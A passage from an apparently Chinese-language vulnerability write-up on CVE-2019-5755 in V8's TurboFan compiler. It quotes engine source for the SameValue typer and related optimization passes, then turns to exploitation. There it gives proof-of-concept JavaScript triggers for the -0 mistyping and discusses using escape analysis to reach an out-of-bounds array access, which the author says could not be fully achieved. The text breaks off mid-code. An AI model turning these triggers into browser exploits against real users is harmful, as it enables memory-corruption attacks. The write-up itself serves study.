(rhs.<span class="built_in">Is</span>(Type::<span class="built_in">NaN</span>())) &#123;</span><br><span class="line">    <span class="keyword">if</span> (!lhs.<span class="built_in">Maybe</span>(Type::<span class="built_in">NaN</span>())) <span class="keyword">return</span> <span class="built_in">singleton_false</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> (lhs.<span class="built_in">Is</span>(Type::<span class="built_in">MinusZero</span>())) &#123;</span><br><span class="line">    <span class="keyword">if</span> (rhs.<span class="built_in">Is</span>(Type::<span class="built_in">MinusZero</span>())) <span class="keyword">return</span> <span class="built_in">singleton_true</span>();</span><br><span class="line">    <span class="keyword">if</span> (!rhs.<span class="built_in">Maybe</span>(Type::<span class="built_in">MinusZero</span>())) <span class="keyword">return</span> <span class="built_in">singleton_false</span>();</span><br><span class="line">   <span class="comment">// 如果左右操作数不同时为 MinusZero，则返回 false。</span></span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (rhs.<span class="built_in">Is</span>(Type::<span class="built_in">MinusZero</span>())) &#123;</span><br><span class="line">    <span class="keyword">if</span> (!lhs.<span class="built_in">Maybe</span>(Type::<span class="built_in">MinusZero</span>())) <span class="keyword">return</span> <span class="built_in">singleton_false</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> (lhs.<span class="built_in">Is</span>(Type::<span class="built_in">OrderedNumber</span>()) &amp;&amp; rhs.<span class="built_in">Is</span>(Type::<span class="built_in">OrderedNumber</span>()) &amp;&amp;</span><br><span class="line">      (lhs.<span class="built_in">Max</span>() &lt; rhs.<span class="built_in">Min</span>() || lhs.<span class="built_in">Min</span>() &gt; rhs.<span class="built_in">Max</span>())) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">singleton_false</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> Type::<span class="built_in">Boolean</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>当 SameValue 结点计算出 确定性的类型（即 true / false）后，turboFan 将在 TypedLoweringPhase 阶段中的 ConstantFoldingReducer 对 SameValue 进行结点替换，用之前计算出的 HeapConstant 替换当前的 SameValue 结点：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Reduction <span class="title">ConstantFoldingReducer::Reduce</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  DisallowHeapAccess no_heap_access;</span><br><span class="line"><span class="comment">// Check if the output type is a singleton.  In that case we already know the</span></span><br><span class="line">  <span class="comment">// result value and can simply replace the node if it&#x27;s eliminable.</span></span><br><span class="line">  <span class="comment">// 如果当前结点的 type 是 singleton，即确定只有一种类型，则开始优化</span></span><br><span class="line">  <span class="keyword">if</span> (!NodeProperties::<span class="built_in">IsConstant</span>(node) &amp;&amp; NodeProperties::<span class="built_in">IsTyped</span>(node) &amp;&amp;</span><br><span class="line">      node-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">HasProperty</span>(Operator::kEliminatable)) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// We can only constant-fold nodes here, that are known to not cause any</span></span><br><span class="line">    <span class="comment">// side-effect, may it be a JavaScript observable side-effect or a possible</span></span><br><span class="line">    <span class="comment">// eager deoptimization exit (i.e. &#123;node&#125; has an operator that doesn&#x27;t have</span></span><br><span class="line">    <span class="comment">// the Operator::kNoDeopt property).</span></span><br><span class="line">    <span class="comment">// 获取当前结点的类型</span></span><br><span class="line">    Type upper = NodeProperties::<span class="built_in">GetType</span>(node);</span><br><span class="line">    <span class="keyword">if</span> (!upper.<span class="built_in">IsNone</span>()) &#123;</span><br><span class="line">      Node* replacement = <span class="literal">nullptr</span>;</span><br><span class="line">      <span class="comment">// 如果当前结点是 HeapConstant</span></span><br><span class="line">      <span class="keyword">if</span> (upper.<span class="built_in">IsHeapConstant</span>()) &#123;</span><br><span class="line">        replacement = <span class="built_in">jsgraph</span>()-&gt;<span class="built_in">Constant</span>(upper.<span class="built_in">AsHeapConstant</span>()-&gt;<span class="built_in">Ref</span>());</span><br><span class="line">      &#125; <span class="keyword">else</span> <span class="keyword">if</span> <span class="comment">// ...</span></span><br><span class="line">      <span class="comment">// ...</span></span><br><span class="line">      <span class="keyword">if</span> (replacement) &#123;</span><br><span class="line">        <span class="comment">// Make sure the node has a type.</span></span><br><span class="line">        <span class="comment">// 使用新类型进行替换</span></span><br><span class="line">        <span class="keyword">if</span> (!NodeProperties::<span class="built_in">IsTyped</span>(replacement)) &#123;</span><br><span class="line">          NodeProperties::<span class="built_in">SetType</span>(replacement, upper);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="built_in">ReplaceWithValue</span>(node, replacement);</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">Changed</span>(replacement);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>若 SameValue 无法得到确定性的类型，则将在 TypedLoweringPhase  中通过 <code>TypedOptimization::ReduceSameValue</code> 函数进行另一种优化。以下是该函数的源码，在该源码中我们可以了解到 ReduceSameValue 的详细执行过程：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Reduction <span class="title">TypedOptimization::ReduceSameValue</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(IrOpcode::kSameValue, node-&gt;<span class="built_in">opcode</span>());</span><br><span class="line">  Node* <span class="type">const</span> lhs = NodeProperties::<span class="built_in">GetValueInput</span>(node, <span class="number">0</span>);</span><br><span class="line">  Node* <span class="type">const</span> rhs = NodeProperties::<span class="built_in">GetValueInput</span>(node, <span class="number">1</span>);</span><br><span class="line">  Type <span class="type">const</span> lhs_type = NodeProperties::<span class="built_in">GetType</span>(lhs);</span><br><span class="line">  Type <span class="type">const</span> rhs_type = NodeProperties::<span class="built_in">GetType</span>(rhs);</span><br><span class="line">  <span class="keyword">if</span> (lhs == rhs) &#123;</span><br><span class="line">    <span class="comment">// SameValue(x,x) =&gt; #true</span></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Replace</span>(<span class="built_in">jsgraph</span>()-&gt;<span class="built_in">TrueConstant</span>());</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (lhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">Unique</span>()) &amp;&amp; rhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">Unique</span>())) &#123;</span><br><span class="line">    <span class="comment">// SameValue(x:unique,y:unique) =&gt; ReferenceEqual(x,y)</span></span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">simplified</span>()-&gt;<span class="built_in">ReferenceEqual</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (lhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">String</span>()) &amp;&amp; rhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">String</span>())) &#123;</span><br><span class="line">    <span class="comment">// SameValue(x:string,y:string) =&gt; StringEqual(x,y)</span></span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">simplified</span>()-&gt;<span class="built_in">StringEqual</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (lhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">MinusZero</span>())) &#123;</span><br><span class="line">    <span class="comment">// SameValue(x:minus-zero,y) =&gt; ObjectIsMinusZero(y)</span></span><br><span class="line">    node-&gt;<span class="built_in">RemoveInput</span>(<span class="number">0</span>);</span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">simplified</span>()-&gt;<span class="built_in">ObjectIsMinusZero</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (rhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">MinusZero</span>())) &#123;</span><br><span class="line">    <span class="comment">// SameValue(x,y:minus-zero) =&gt; ObjectIsMinusZero(x)</span></span><br><span class="line">    node-&gt;<span class="built_in">RemoveInput</span>(<span class="number">1</span>);</span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">simplified</span>()-&gt;<span class="built_in">ObjectIsMinusZero</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (lhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">NaN</span>())) &#123;</span><br><span class="line">    <span class="comment">// SameValue(x:nan,y) =&gt; ObjectIsNaN(y)</span></span><br><span class="line">    node-&gt;<span class="built_in">RemoveInput</span>(<span class="number">0</span>);</span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">simplified</span>()-&gt;<span class="built_in">ObjectIsNaN</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (rhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">NaN</span>())) &#123;</span><br><span class="line">    <span class="comment">// SameValue(x,y:nan) =&gt; ObjectIsNaN(x)</span></span><br><span class="line">    node-&gt;<span class="built_in">RemoveInput</span>(<span class="number">1</span>);</span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">simplified</span>()-&gt;<span class="built_in">ObjectIsNaN</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (lhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">PlainNumber</span>()) &amp;&amp;</span><br><span class="line">             rhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">PlainNumber</span>())) &#123;</span><br><span class="line">    <span class="comment">// SameValue(x:plain-number,y:plain-number) =&gt; NumberEqual(x,y)</span></span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">simplified</span>()-&gt;<span class="built_in">NumberEqual</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>我们再简单了解一下 SpeculativeSafeIntegerSubtract 和 SpeculativeNumberSubtract 结点的生成方式。这两种结点的生成都将通过以下调用链：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">PipelineImpl::CreateGraph</span><span class="params">()</span></span></span><br><span class="line"><span class="function">  <span class="type">void</span> <span class="title">GraphBuilderPhase::Run</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">    <span class="type">void</span> <span class="title">BytecodeGraphBuilder::CreateGraph</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">      <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitBytecodes</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">        <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitSingleBytecode</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">          <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitSubSmi</span><span class="params">()</span></span></span><br><span class="line"><span class="function">            <span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildBinaryOpWithImmediate</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">              <span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildBinaryOp</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">                <span class="title">BytecodeGraphBuilder::TryBuildSimplifiedBinaryOp</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">                  JSTypeHintLowering::LoweringResult <span class="title">JSTypeHintLowering::ReduceBinaryOperation</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">                    Node* <span class="title">TryBuildNumberBinop</span><span class="params">()</span></span></span><br><span class="line"><span class="function">                      <span class="type">const</span> Operator* <span class="title">SpeculativeNumberOp</span><span class="params">(NumberOperationHint hint)</span></span></span><br></pre></td></tr></table></figure><p>调用到最终的目标函数 <code>SpeculativeNumberOp</code>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">const</span> Operator* <span class="title">SpeculativeNumberOp</span><span class="params">(NumberOperationHint hint)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">switch</span> (op_-&gt;<span class="built_in">opcode</span>()) &#123;</span><br><span class="line">      <span class="comment">// ...</span></span><br><span class="line">      <span class="keyword">case</span> IrOpcode::kJSSubtract:</span><br><span class="line">        <span class="keyword">if</span> (hint == NumberOperationHint::kSignedSmall ||</span><br><span class="line">            hint == NumberOperationHint::kSigned32) &#123;</span><br><span class="line">          <span class="keyword">return</span> <span class="built_in">simplified</span>()-&gt;<span class="built_in">SpeculativeSafeIntegerSubtract</span>(hint);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">          <span class="keyword">return</span> <span class="built_in">simplified</span>()-&gt;<span class="built_in">SpeculativeNumberSubtract</span>(hint);</span><br><span class="line">        &#125;</span><br><span class="line">      <span class="comment">// ...</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">UNREACHABLE</span>();</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure><p>在 TryBuildNumberBinop 函数中，turboFan 试图从 feedback_vector 中获取操作数的相关信息。操作数信息一共有以下五种类型：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// A hint for speculative number operations.</span></span><br><span class="line"><span class="keyword">enum class</span> <span class="title class_">NumberOperationHint</span> : <span class="type">uint8_t</span> &#123;</span><br><span class="line">  kSignedSmall,        <span class="comment">// Inputs were Smi, output was in Smi.</span></span><br><span class="line">  kSignedSmallInputs,  <span class="comment">// Inputs were Smi, output was Number.</span></span><br><span class="line">  kSigned32,           <span class="comment">// Inputs were Signed32, output was Number.</span></span><br><span class="line">  kNumber,             <span class="comment">// Inputs were Number, output was Number.</span></span><br><span class="line">  kNumberOrOddball,    <span class="comment">// Inputs were Number or Oddball, output was Number.</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>当且仅当操作数类型为 <code>NumberOperationHint::kSignedSmall</code> 或 <code>NumberOperationHint::kSigned32</code>时，当前减法才会被视为是 Safe 的，因此创建 SpeculativeSafeIntegerSubtract 结点；否则创建保守的 SpeculativeNumberSubtract 结点。</p></li><li><p>最后附带说明一下<strong>部分数字类型的范围</strong>：</p><blockquote><p>参照源码 src/compiler/types.h</p></blockquote><ul><li><p>一些基础类型</p><ul><li>OtherNumber（ON）：$(-\infty, -2^{31}) \cup [2^{32}, \infty)$</li><li>OtherSigned32（OS32） ：$[-2^{31}, -2^{30})$</li><li>Negative31（N31）：$[-2^{30}, 0)$</li><li>Unsigned30（U30）: $[0, 2^{30})$</li><li>OtherUnsigned31（OU31）: $[2^{30}, 2^{31})$</li><li>OtherUnsigned32（OU32）: $[2^{31}, 2^{32})$</li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">  ON    OS32     N31     U30     OU31    OU32     ON</span><br><span class="line">______[_______[_______[_______[_______[_______[_______</span><br><span class="line">    <span class="number">-2</span>^<span class="number">31</span>   <span class="number">-2</span>^<span class="number">30</span>     <span class="number">0</span>      <span class="number">2</span>^<span class="number">30</span>    <span class="number">2</span>^<span class="number">31</span>    <span class="number">2</span>^<span class="number">32</span></span><br></pre></td></tr></table></figure></li></ul></li><li><p>Integral32：$[-2^{31}, 2^{32})$</p></li><li><p>PlainNumber：任何浮点数，不包括 $-0$</p></li><li><p>Number：任何浮点数，包括 $-0$、$NaN$</p></li><li><p>Numeric：任何浮点数，包括 $-0$、$NaN$ 以及 $BigInt$</p></li></ul><h2 id="四、漏洞利用">四、漏洞利用</h2><blockquote><p>尽管理论上可以通过该漏洞构造<strong>越界读取原语</strong>，但实际利用起来仍然存在一个无法解决的问题。</p><p>即便如此，我们仍然可以在尝试构造漏洞利用中加深对 turboFan 的理解。</p></blockquote><p>初始 Poc 如下</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">foo</span>(<span class="params">trigger</span>) &#123;</span><br><span class="line">    <span class="keyword">var</span> idx = <span class="title class_">Object</span>.<span class="title function_">is</span>((trigger ? -<span class="number">0</span> : <span class="number">0</span>) - <span class="number">0</span>, -<span class="number">0</span>);</span><br><span class="line">    <span class="keyword">return</span> idx;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">foo</span>(<span class="literal">false</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(foo);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">foo</span>(<span class="literal">true</span>)); <span class="comment">// expected: true, got: false</span></span><br></pre></td></tr></table></figure><p>从 turbolizer 中可以看到，不管传入函数的参数是什么，最后都将会把 SameValue 结点<strong>直接优化</strong>为 HeapConstant&lt;false&gt;，同时<strong>运行时 idx 值也是 false</strong>，两个结果相同，因此无法利用漏洞。</p><p>为什么运行时 idx 值也是 false 呢？因为当生成了 HeapConstant&lt;false&gt;之后，turboFan 就会直接优化变量 idx 的计算过程，直接取结果值 false：</p><p><img src="/2021/02/CVE-2019-5755/heapconstant_asm.png" alt="img"></p><p>我们<strong>希望</strong>，传入 -0 时（即传入参数 true），编译时<strong>SameValue 结点类型为 false，但运行时的结果为 true</strong>，这样就会有一个范围差，我们便可以利用它来计算出错误的范围。换句话说，我们需要让 turboFan 认为<strong>编译时</strong>的 SameValue 结点值为 0，但<strong>运行时</strong>的值是 1，这样我们才可以利用这个差值搭配乘法进行数组越界。</p><blockquote><p><strong>编译时</strong>的值：turboFan 执行 type 时所确认的值/范围，即静态分析时确定的数值。</p><p><strong>运行时</strong>的值，终端调用 v8 执行 JS 程序时最终计算出的值。</p></blockquote><p>因此，我们就必须<strong>禁止 turboFan 为 SameValue 结点生成 HeapConstant&lt;false&gt;结点</strong>，也就是说我们就必须在执行 simplified lowering 前的所有 ConstantFoldingReducer 时，<strong>不精确计算出</strong> SameValue 的类型，即推迟该节点被 type 为 HeapConstant 的时机至<strong>执行完所有 ConstantFoldingReducer  之后</strong>。否则一旦出现 HeapConstant，则<strong>运行时</strong>的 idx 变量值就固定为该 HeapConstant，不会再重新计算。</p><p>那么，我们该让 SameValue 在什么时候被精确 type 呢？我们先看一下整个 pipeline 中运行 typer 的地方有哪些：</p><ul><li>TyperPhase 阶段</li><li>LoadEliminationPhase 阶段中的 TypeNarrowingReducer 函数</li><li>SimplifiedLoweringPhase 阶段中的 UpdateFeedbackType 函数</li></ul><blockquote><p>后两种是通过以下宏定义来调用 typer（咋一看还没认出来）：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">switch</span> (node-&gt;<span class="built_in">opcode</span>()) &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DECLARE_CASE(Name)                               \</span></span><br><span class="line"><span class="meta">  case IrOpcode::k##Name: &#123;                              \</span></span><br><span class="line"><span class="meta">    new_type = op_typer_.Name(input0_type, input1_type); \</span></span><br><span class="line"><span class="meta">    break;                                               \</span></span><br><span class="line"><span class="meta">  &#125;</span></span><br><span class="line">      <span class="built_in">SIMPLIFIED_NUMBER_BINOP_LIST</span>(DECLARE_CASE)</span><br><span class="line"><span class="meta">#<span class="keyword">undef</span> DECLARE_CASE</span></span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></blockquote><p>而 ConstantFoldingReducer 出现在 <code>TypedLoweringPhase</code> 和 <code>LoadEliminationPhase</code>。因此我们只能让 SameValue 在 <strong>SimplifiedLoweringPhase</strong> 阶段被精确 type。</p><p>但需要注意的是，TypedOptimization in TypedLoweringPhase 将会对 SameValue 进行一次 reduce 操作。我们必须阻止它将 SameValue 结点优化成 ObjectIsMinusZero 结点，因为该结点将不会在 simplifedLoweringPhase 中进行 type（只会进行节点替换，替换成 Int32Constant）。</p><p>综合上面的要求，我们不能让 turboFan 在 EscapeAnalysisPhase 之前的 Phase 中，确认出 SameValue 的第二个 操作数类型为 MinusZero。因此，就需要引入一点点 EscapeAnalysis 的内容 （完整内容请查阅 <a href="https://www.jfokus.se/jfokus18/preso/Escape-Analysis-in-V8.pdf">Escape-Analysis-in-V8</a>）：</p><p><img src="/2021/02/CVE-2019-5755/escape_analysis_writing_field.png" alt="img"></p><p>简单来说，EscapeAnalysis 可以但不限于<strong>将一个 LoadField 操作转换成一个栈变量读取操作</strong>。这样，在 EscapeAnalysisPhase 之前的  Phase，由于 LoadField 结点的存在，自然就无法获取到对应值的类型。因此笔者一开始将 Poc 修改为如下：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">foo</span>(<span class="params">trigger</span>) &#123;</span><br><span class="line">    <span class="keyword">let</span> obj = &#123; <span class="attr">a</span>: -<span class="number">0</span> &#125;; <span class="comment">// Escape Analysis 特供1</span></span><br><span class="line">    <span class="keyword">let</span> wrongNum = (trigger ? -<span class="number">0</span> : <span class="number">0</span>) - <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">let</span> idx = <span class="title class_">Object</span>.<span class="title function_">is</span>(wrongNum, obj.<span class="property">a</span>);</span><br><span class="line">    <span class="keyword">return</span> idx + <span class="number">1</span>;</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Escape Analysis 特供2</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; <span class="number">2</span>; a++)</span><br><span class="line">    <span class="title function_">foo</span>(<span class="literal">false</span>);</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(foo);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">foo</span>(<span class="literal">true</span>)); <span class="comment">// expected: true, got: false</span></span><br></pre></td></tr></table></figure><blockquote><p>需要注意的是，Escape Analysis 对函数的 type feedback有一定的要求。如果目标函数只运行了<strong>一次</strong>，那么 escape analysis 分析效果非常的差，基本上无法分析出任何有用的东西，包括刚刚说的 LoadField 替换也无法完成。因此必须在优化前多执行几次目标函数。</p><p>同时，Escape Analysis 的目标对象，必须有个修饰符 let / var，否则无法替换 LoadField 结点，这其中主要是因为作用域的关系。</p></blockquote><p>但实际调试发现， LoadField 结点的替换将会被 LoadElimination（ 位于 LoadEliminationPhase） 截胡。也就是说，在 LoadEliminationPhase 时，obj.a 就会被替换成 -0。相关代码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Reduction <span class="title">LoadElimination::ReduceLoadField</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  FieldAccess <span class="type">const</span>&amp; access = <span class="built_in">FieldAccessOf</span>(node-&gt;<span class="built_in">op</span>());</span><br><span class="line">  Node* object = NodeProperties::<span class="built_in">GetValueInput</span>(node, <span class="number">0</span>);</span><br><span class="line">  Node* effect = NodeProperties::<span class="built_in">GetEffectInput</span>(node);</span><br><span class="line">  Node* control = NodeProperties::<span class="built_in">GetControlInput</span>(node);</span><br><span class="line">  AbstractState <span class="type">const</span>* state = node_states_.<span class="built_in">Get</span>(effect);</span><br><span class="line">  <span class="keyword">if</span> (state == <span class="literal">nullptr</span>) <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">  <span class="keyword">if</span> (access.offset == HeapObject::kMapOffset &amp;&amp;</span><br><span class="line">      access.base_is_tagged == kTaggedBase) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="type">int</span> field_index = <span class="built_in">FieldIndexOf</span>(access);</span><br><span class="line">    <span class="keyword">if</span> (field_index &gt;= <span class="number">0</span>) &#123;</span><br><span class="line">      <span class="keyword">if</span> (Node* replacement = state-&gt;<span class="built_in">LookupField</span>(object, field_index)) &#123;</span><br><span class="line">        <span class="comment">// Make sure we don&#x27;t resurrect dead &#123;replacement&#125; nodes.</span></span><br><span class="line">        <span class="keyword">if</span> (!replacement-&gt;<span class="built_in">IsDead</span>()) &#123;</span><br><span class="line">          <span class="comment">// Introduce a TypeGuard if the type of the &#123;replacement&#125; node is not</span></span><br><span class="line">          <span class="comment">// a subtype of the original &#123;node&#125;&#x27;s type.</span></span><br><span class="line">          <span class="keyword">if</span> (!NodeProperties::<span class="built_in">GetType</span>(replacement)</span><br><span class="line">                   .<span class="built_in">Is</span>(NodeProperties::<span class="built_in">GetType</span>(node))) &#123;</span><br><span class="line">            Type replacement_type = Type::<span class="built_in">Intersect</span>(</span><br><span class="line">                NodeProperties::<span 